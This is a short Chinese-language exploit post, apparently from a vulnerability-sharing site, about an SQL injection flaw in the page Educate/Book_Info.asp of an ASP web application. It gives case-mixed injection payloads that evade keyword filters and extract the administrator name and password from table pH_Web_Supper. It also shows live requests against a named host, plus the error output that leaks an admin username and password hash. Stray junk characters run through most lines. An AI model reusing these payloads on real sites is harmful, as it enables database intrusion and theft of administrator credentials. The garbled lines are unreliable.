漏洞出现在Educate/Book_Info.asp
8 \; j, n4 A. c此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
- q8 Z& M+ Q# G+ v" rexp:如下* a+ D0 v7 J e+ A* U
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
$ |: r1 l' e* l, m4 {查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)) @; u Q& o, w) F
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)- {5 n" l9 V/ l( P0 @' I. Z
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'/ ] }9 m4 k/ ?) V7 b7 y
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
4 {7 M1 L& z' i, {1 x' @/Educate/Book_Info.asp,行 8' y9 J( `. y( i U, f; N
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper): K7 x6 F g" A' {3 o8 X
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'* v# [1 r% F& v
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
0 {# r! e l q( ?- w' X3 [/Educate/Book_Info.asp,行 8 |